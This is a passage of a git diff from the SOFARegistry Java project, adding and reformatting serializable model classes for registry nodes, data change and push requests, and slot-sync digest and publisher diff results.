return StringFormatter.format( + "{}-Node{{},region={},dc={}}", getNodeType(), nodeName, regionId, dataCenter); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/DataNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/DataNode.java new file mode 100644 index 000000000..449f8905c --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/DataNode.java @@ -0,0 +1,85 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.nodes; + +import com.alipay.sofa.registry.common.model.store.URL; +import java.util.Objects; + +/** + * @author shangyu.wh + * @version $Id: DataNode.java, v 0.1 2018-01-18 18:06 shangyu.wh Exp $ + */ +public class DataNode extends AbstractNode { + + private long registrationTimestamp; + + /** + * constructor + * + * @param nodeUrl + * @param dataCenter + */ + public DataNode(URL nodeUrl, String dataCenter) { + super(dataCenter, nodeUrl, null); + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof DataNode)) { + return false; + } + + DataNode that = (DataNode) o; + return equal(that) && registrationTimestamp == that.registrationTimestamp; + } + + /** + * Hash code int. + * + * @return the int + */ + @Override + public int hashCode() { + return Objects.hash(hash(), registrationTimestamp); + } + + @Override + public NodeType getNodeType() { + return NodeType.DATA; + } + + /** + * Getter method for property registrationTimestamp. + * + * @return property value of registrationTimestamp + */ + public long getRegistrationTimestamp() { + return registrationTimestamp; + } + + /** + * Setter method for property registrationTimestamp. + * + * @param registrationTimestamp value to be assigned to property registrationTimestamp + */ + public void setRegistrationTimestamp(long registrationTimestamp) { + this.registrationTimestamp = registrationTimestamp; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/MetaNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/MetaNode.java new file mode 100644 index 000000000..64afec1ab --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/MetaNode.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.nodes; + +import com.alipay.sofa.registry.common.model.store.URL; + +/** + * @author shangyu.wh + * @version $Id: MetaNode.java, v 0.1 2018-03-02 16:42 shangyu.wh Exp $ + */ +public class MetaNode extends AbstractNode { + + /** + * constructor + * + * @param nodeUrl + * @param dataCenter + */ + public MetaNode(URL nodeUrl, String dataCenter) { + super(dataCenter, nodeUrl, null); + } + + @Override + public NodeType getNodeType() { + return NodeType.META; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + MetaNode that = (MetaNode) o; + return super.equal(that); + } + + @Override + public int hashCode() { + return super.hash(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/SessionNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/SessionNode.java new file mode 100644 index 000000000..bdd345375 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/SessionNode.java @@ -0,0 +1,72 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.nodes; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.store.URL; + +/** + * @author shangyu.wh + * @version $Id: SessionNodeRegister.java, v 0.1 2018-01-11 16:32 shangyu.wh Exp $ + */ +public class SessionNode extends AbstractNode { + + private final ProcessId processId; + + /** + * constructor + * + * @param nodeUrl + * @param regionId + */ + public SessionNode(URL nodeUrl, String regionId, ProcessId processId) { + super(null, nodeUrl, regionId); + this.processId = processId; + } + + @Override + public NodeType getNodeType() { + return NodeType.SESSION; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof SessionNode)) { + return false; + } + + SessionNode that = (SessionNode) o; + return equal(that); + } + + public ProcessId getProcessId() { + return processId; + } + + /** + * Hash code int. + * + * @return the int + */ + @Override + public int hashCode() { + return super.hash(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/rpc/NodeClusterViewRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/rpc/NodeClusterViewRequest.java new file mode 100644 index 000000000..350c2a8ef --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/rpc/NodeClusterViewRequest.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.rpc; + +import com.alipay.sofa.registry.common.model.Node.NodeType; +import java.io.Serializable; + +/** + * @author shangyu.wh + * @version $Id: GetChangeListRequest.java, v 0.1 2018-02-12 11:02 shangyu.wh Exp $ + */ +public class NodeClusterViewRequest implements Serializable { + + private final NodeType nodeType; + + /** get list data dataCenter */ + private final String dataCenterId; + + /** + * constructor + * + * @param nodeType + * @param dataCenterId + */ + public NodeClusterViewRequest(NodeType nodeType, String dataCenterId) { + this.nodeType = nodeType; + this.dataCenterId = dataCenterId; + } + + /** + * Getter method for property dataCenterId. + * + * @return property value of dataCenterId + */ + public String getDataCenterId() { + return dataCenterId; + } + + /** + * Getter method for property nodeType. + * + * @return property value of nodeType + */ + public NodeType getNodeType() { + return nodeType; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("GetChangeListRequest{"); + sb.append("nodeType=").append(nodeType); + sb.append(", dataCenterId='").append(dataCenterId).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/CancelAddressRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/CancelAddressRequest.java index 6415ca2ae..716c8fb33 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/CancelAddressRequest.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/CancelAddressRequest.java @@ -16,50 +16,52 @@ */ package com.alipay.sofa.registry.common.model.sessionserver; +import com.alipay.sofa.registry.common.model.ConnectId; import java.io.Serializable; import java.util.List; /** * The type Cancel address request. + * * @author shangyu.wh * @version $Id : CancelAddressRequest.java, v 0.1 2017-12-22 17:04 shangyu.wh Exp $ */ public class CancelAddressRequest implements Serializable { - private static final long serialVersionUID = -4398310292728124256L; + private static final long serialVersionUID = -4398310292728124256L; - private List connectIds; + private List connectIds; - public CancelAddressRequest() { - } + // the bean used in http facade, need no-arg construct + public CancelAddressRequest() {} - /** - * Constructor. - * - * @param connectIds the connect ids - */ - public CancelAddressRequest(List connectIds) { - this.connectIds = connectIds; - } + /** + * Constructor. + * + * @param connectIds the connect ids + */ + public CancelAddressRequest(List connectIds) { + this.connectIds = connectIds; + } - /** - * Getter method for property connectIds. - * - * @return property value of connectIds - */ - public List getConnectIds() { - return connectIds; - } + /** + * Getter method for property connectIds. + * + * @return property value of connectIds + */ + public List getConnectIds() { + return connectIds; + } - public void setConnectIds(List connectIds) { - this.connectIds = connectIds; - } + public void setConnectIds(List connectIds) { + this.connectIds = connectIds; + } - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("CancelAddressRequest{"); - sb.append("connectIds=").append(connectIds); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("CancelAddressRequest{"); + sb.append("connectIds=").append(connectIds); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataChangeRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataChangeRequest.java index 9f8d194c8..f9206ac48 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataChangeRequest.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataChangeRequest.java @@ -16,106 +16,45 @@ */ package com.alipay.sofa.registry.common.model.sessionserver; -import com.alipay.sofa.registry.common.model.store.WordCache; - +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import java.io.Serializable; +import java.util.*; /** - * request to notify sessionserver when data changed + * request to notify session server when data changed * * @author qian.lqlq * @version $Id: DataChangeRequest.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ */ public class DataChangeRequest implements Serializable { - private static final long serialVersionUID = -7674982522990222894L; - - private String dataInfoId; - - private String dataCenter; - - private long version; - - /** - * constructor - */ - public DataChangeRequest() { - } - - /** - * constructor - * @param dataInfoId - * @param dataCenter - * @param version - */ - public DataChangeRequest(String dataInfoId, String dataCenter, long version) { - this.dataInfoId = dataInfoId; - this.dataCenter = dataCenter; - this.version = version; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = WordCache.getInstance().getWordCache(dataInfoId); - } + private static final long serialVersionUID = -7674982522990222894L; - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } + private final Map dataInfoIds; - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = WordCache.getInstance().getWordCache(dataCenter); - } + private final String dataCenter; - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; - } + public DataChangeRequest(String dataCenter, Map dataInfoIds) { + this.dataCenter = dataCenter; + this.dataInfoIds = dataInfoIds; + } - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(long version) { - this.version = version; - } + public Map getDataInfoIds() { + return Collections.unmodifiableMap(dataInfoIds); + } - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("DataChangeRequest{"); - sb.append("dataInfoId='").append(dataInfoId).append('\''); - sb.append(", dataCenter='").append(dataCenter).append('\''); - sb.append(", version=").append(version); - sb.append('}'); - return sb.toString(); - } + public String getDataCenter() { + return dataCenter; + } + @Override + public String toString() { + return "DataChangeRequest{" + + "dataInfoIds=" + + dataInfoIds + + ", dataCenter='" + + dataCenter + + '\'' + + '}'; + } } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataPushRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataPushRequest.java index 5eb1178d4..e8d4ff869 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataPushRequest.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/sessionserver/DataPushRequest.java @@ -16,56 +16,39 @@ */ package com.alipay.sofa.registry.common.model.sessionserver; -import com.alipay.sofa.registry.common.model.dataserver.Datum; - +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.util.StringFormatter; import java.io.Serializable; /** - * * @author shangyu.wh * @version $Id: DataPushRequest.java, v 0.1 2018-08-29 18:11 shangyu.wh Exp $ */ public class DataPushRequest implements Serializable { - private Datum datum; - - /** - * constructor - * @param datum - */ - public DataPushRequest(Datum datum) { - this.datum = datum; - } - - /** - * Getter method for property datum. - * - * @return property value of datum - */ - public Datum getDatum() { - return datum; - } - - /** - * Setter method for property datum. - * - * @param datum value to be assigned to property datum - */ - public void setDatum(Datum datum) { - this.datum = datum; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("DataPushRequest{"); - sb.append("dataInfoId=").append(datum.getDataInfoId()); - sb.append(", dataCenter=").append(datum.getDataCenter()); - sb.append(", version=").append(datum.getVersion()); - if (datum.getPubMap() != null) { - sb.append(", pubsize=").append(datum.getPubMap().size()); - } - sb.append('}'); - return sb.toString(); - } - -} \ No newline at end of file + private final SubDatum datum; + + /** + * constructor + * + * @param datum + */ + public DataPushRequest(SubDatum datum) { + this.datum = datum; + } + + public SubDatum getDatum() { + return datum; + } + + @Override + public String toString() { + return StringFormatter.format( + "DataPushRequest{{},{},ver={},num={},bytes={}}", + datum.getDataInfoId(), + datum.getDataCenter(), + datum.getVersion(), + datum.getPublishers().size(), + datum.getDataBoxBytes()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/BaseSlotStatus.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/BaseSlotStatus.java new file mode 100644 index 000000000..317185d65 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/BaseSlotStatus.java @@ -0,0 +1,115 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import java.io.Serializable; + +/** + * @author chen.zhu + *

Feb 24, 2021 + */ +public class BaseSlotStatus implements Serializable { + + protected final int slotId; + + protected final long slotLeaderEpoch; + + protected final Slot.Role role; + + protected final String server; + + /** + * Constructor. + * + * @param slotId the slot id + * @param slotLeaderEpoch the slot leader epoch + * @param role the role + * @param server + */ + public BaseSlotStatus(int slotId, long slotLeaderEpoch, Slot.Role role, String server) { + this.slotId = slotId; + this.slotLeaderEpoch = slotLeaderEpoch; + this.role = role; + this.server = server; + } + + /** + * Gets get slot id. + * + * @return the get slot id + */ + public int getSlotId() { + return slotId; + } + + /** + * Gets get slot leader epoch. + * + * @return the get slot leader epoch + */ + public long getSlotLeaderEpoch() { + return slotLeaderEpoch; + } + + /** + * Gets get role. + * + * @return the get role + */ + public Slot.Role getRole() { + return role; + } + + /** + * Gets get data server. + * + * @return the get data server + */ + public String getServer() { + return server; + } + + public enum LeaderStatus { + INIT, + HEALTHY, + UNHEALTHY; + + /** + * Is healthy boolean. + * + * @return the boolean + */ + public boolean isHealthy() { + return this == HEALTHY; + } + } + + @Override + public String toString() { + return "BaseSlotStatus{" + + "slotId=" + + slotId + + ", slotLeaderEpoch=" + + slotLeaderEpoch + + ", role=" + + role + + ", server='" + + server + + '\'' + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataNodeSlot.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataNodeSlot.java new file mode 100644 index 000000000..de3f12ebb --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataNodeSlot.java @@ -0,0 +1,164 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.io.Serializable; +import java.util.*; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-03 11:27 yuzhi.lyz Exp $ + */ +public final class DataNodeSlot implements Serializable { + private static final long serialVersionUID = -4418378966762753298L; + private final String dataNode; + private final Set leaders = Sets.newTreeSet(); + private final Set followers = Sets.newTreeSet(); + + /** + * Constructor. + * + * @param dataNode the data node + */ + public DataNodeSlot(String dataNode) { + this.dataNode = dataNode; + } + + /** + * Fork data node slot. + * + * @param ignoreFollowers the ignore followers + * @return the data node slot + */ + public DataNodeSlot fork(boolean ignoreFollowers) { + DataNodeSlot clone = new DataNodeSlot(dataNode); + clone.leaders.addAll(leaders); + if (!ignoreFollowers) { + clone.followers.addAll(followers); + } + return clone; + } + + public DataNodeSlot addLeader(int slotId) { + leaders.add(slotId); + return this; + } + + public DataNodeSlot addLeader(Collection slotIds) { + leaders.addAll(slotIds); + return this; + } + + public DataNodeSlot removeLeader(int slotId) { + leaders.remove(slotId); + return this; + } + + public DataNodeSlot addFollower(int slotId) { + followers.add(slotId); + return this; + } + + public DataNodeSlot addFollower(Collection slotIds) { + followers.addAll(slotIds); + return this; + } + + public DataNodeSlot removeFollower(int slotId) { + followers.remove(slotId); + return this; + } + + public boolean containsLeader(int slotId) { + return leaders.contains(slotId); + } + + public boolean containsFollower(int slotId) { + return followers.contains(slotId); + } + + /** + * Getter method for property dataNode. + * + * @return property value of dataNode + */ + public String getDataNode() { + return dataNode; + } + + /** + * Getter method for property leaders. + * + * @return property value of leaders + */ + public Set getLeaders() { + return Collections.unmodifiableSet(leaders); + } + + /** + * Getter method for property followers. + * + * @return property value of followers + */ + public Set getFollowers() { + return Collections.unmodifiableSet(followers); + } + + /** + * Total slot num int. + * + * @return the int + */ + public int totalSlotNum() { + return leaders.size() + followers.size(); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + DataNodeSlot that = (DataNodeSlot) o; + return Objects.equals(dataNode, that.dataNode) + && Objects.equals(leaders, that.leaders) + && Objects.equals(followers, that.followers); + } + + @Override + public int hashCode() { + return Objects.hash(dataNode, leaders, followers); + } + + @Override + public String toString() { + return StringFormatter.format( + "DataNodeSlot{{},leaders={}/{},followers={}/{}", + dataNode, + leaders.size(), + leaders, + followers.size(), + followers); + } + + public static List collectDataNodes(Collection dataNodeSlots) { + Set ret = Sets.newLinkedHashSet(); + dataNodeSlots.forEach(d -> ret.add(d.dataNode)); + return Lists.newArrayList(ret); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffDigestRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffDigestRequest.java new file mode 100644 index 000000000..a25b5e8e9 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffDigestRequest.java @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import java.io.Serializable; +import java.util.Collections; +import java.util.Map; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-05 14:24 yuzhi.lyz Exp $ + */ +public class DataSlotDiffDigestRequest implements Serializable { + private final long slotTableEpoch; + // all dataInfoIds, diff by digest + private final Map datumDigest; + private final int slotId; + + public DataSlotDiffDigestRequest( + long slotTableEpoch, int slotId, Map datumDigest) { + this.slotTableEpoch = slotTableEpoch; + this.slotId = slotId; + this.datumDigest = datumDigest == null ? Collections.emptyMap() : datumDigest; + } + + /** + * Getter method for property slotId. + * + * @return property value of slotId + */ + public int getSlotId() { + return slotId; + } + + /** + * Getter method for property slotTableEpoch. + * + * @return property value of slotTableEpoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + public Map getDatumDigest() { + return Collections.unmodifiableMap(datumDigest); + } + + @Override + public String toString() { + return "SlotDiffDigestRequest{" + + "slotTableEpoch=" + + slotTableEpoch + + ", slotId=" + + slotId + + ", digests=" + + datumDigest.size() + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffDigestResult.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffDigestResult.java new file mode 100644 index 000000000..12f749468 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffDigestResult.java @@ -0,0 +1,109 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.google.common.collect.Lists; +import java.io.Serializable; +import java.util.Collections; +import java.util.List; +import org.apache.commons.collections.CollectionUtils; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-05 17:04 yuzhi.lyz Exp $ + */ +public class DataSlotDiffDigestResult implements Serializable { + private long slotTableEpoch; + private final List updatedDataInfoIds; + private final List addedDataInfoIds; + private final List removedDataInfoIds; + // if from session, return the sessionProcessId for lease + private ProcessId sessionProcessId; + + public DataSlotDiffDigestResult( + List updatedDataInfoIds, + List addedDataInfoIds, + List removedDataInfoIds) { + this.updatedDataInfoIds = Lists.newArrayList(updatedDataInfoIds); + this.addedDataInfoIds = Lists.newArrayList(addedDataInfoIds); + this.removedDataInfoIds = Lists.newArrayList(removedDataInfoIds); + } + + /** + * Getter method for property slotTableEpoch. + * + * @return property value of slotTableEpoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + /** + * Setter method for property slotTableEpoch. + * + * @param slotTableEpoch value to be assigned to property slotTableEpoch + */ + public void setSlotTableEpoch(long slotTableEpoch) { + this.slotTableEpoch = slotTableEpoch; + } + + public List getUpdatedDataInfoIds() { + return Collections.unmodifiableList(updatedDataInfoIds); + } + + /** + * Getter method for property removedDataInfoIds. + * + * @return property value of removedDataInfoIds + */ + public List getRemovedDataInfoIds() { + return Collections.unmodifiableList(removedDataInfoIds); + } + + public List getAddedDataInfoIds() { + return Collections.unmodifiableList(addedDataInfoIds); + } + + /** + * Getter method for property sessionProcessId. + * + * @return property value of sessionProcessId + */ + public ProcessId getSessionProcessId() { + return sessionProcessId; + } + + /** + * Setter method for property sessionProcessId. + * + * @param sessionProcessId value to be assigned to property sessionProcessId + */ + public void setSessionProcessId(ProcessId sessionProcessId) { + this.sessionProcessId = sessionProcessId; + } + + public boolean isEmpty() { + return CollectionUtils.isEmpty(updatedDataInfoIds) + && CollectionUtils.isEmpty(removedDataInfoIds) + && CollectionUtils.isEmpty(addedDataInfoIds); + } + + public int getUpdateAndAddSize() { + return updatedDataInfoIds.size() + addedDataInfoIds.size(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffPublisherRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffPublisherRequest.java new file mode 100644 index 000000000..2df0861f4 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffPublisherRequest.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.google.common.collect.Lists; +import java.io.Serializable; +import java.util.Collection; +import java.util.Collections; +import java.util.List; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-05 14:24 yuzhi.lyz Exp $ + */ +public class DataSlotDiffPublisherRequest implements Serializable { + private final long slotTableEpoch; + // parts of the summary to diff sync + private final List datumSummaries; + private final int slotId; + + public DataSlotDiffPublisherRequest( + long slotTableEpoch, int slotId, Collection datumSummaries) { + this.slotTableEpoch = slotTableEpoch; + this.slotId = slotId; + this.datumSummaries = + datumSummaries == null + ? Collections.emptyList() + : Collections.unmodifiableList(Lists.newArrayList(datumSummaries)); + } + + /** + * Getter method for property slotId. + * + * @return property value of slotId + */ + public int getSlotId() { + return slotId; + } + + /** + * Getter method for property slotTableEpoch. + * + * @return property value of slotTableEpoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + public List getDatumSummaries() { + return datumSummaries; + } + + @Override + public String toString() { + return "SlotDiffPublisherRequest{" + + ", slotId=" + + slotId + + ", slotTableEpoch=" + + slotTableEpoch + + ", summaries=" + + datumSummaries.size() + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffPublisherResult.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffPublisherResult.java new file mode 100644 index 000000000..00f63c2c8 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffPublisherResult.java @@ -0,0 +1,136 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.io.Serializable; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.apache.commons.collections.MapUtils; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-05 17:04 yuzhi.lyz Exp $ + */ +public class DataSlotDiffPublisherResult implements Serializable { + private long slotTableEpoch; + private final Map> updatedPublishers; + private final Map> removedPublishers; + // if from session, return the sessionProcessId for lease + private ProcessId sessionProcessId; + // contains all the updated/added publishers + private final boolean hasRemain; + + public DataSlotDiffPublisherResult( + boolean hasRemain, + Map> updatedPublishers, + Map> removedPublishers) { + this.updatedPublishers = Maps.newHashMap(updatedPublishers); + this.removedPublishers = Maps.newHashMap(removedPublishers); + this.hasRemain = hasRemain; + } + + public boolean isHasRemain() { + return hasRemain; + } + + /** + * Getter method for property slotTableEpoch. + * + * @return property value of slotTableEpoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + /** + * Setter method for property slotTableEpoch. + * + * @param slotTableEpoch value to be assigned to property 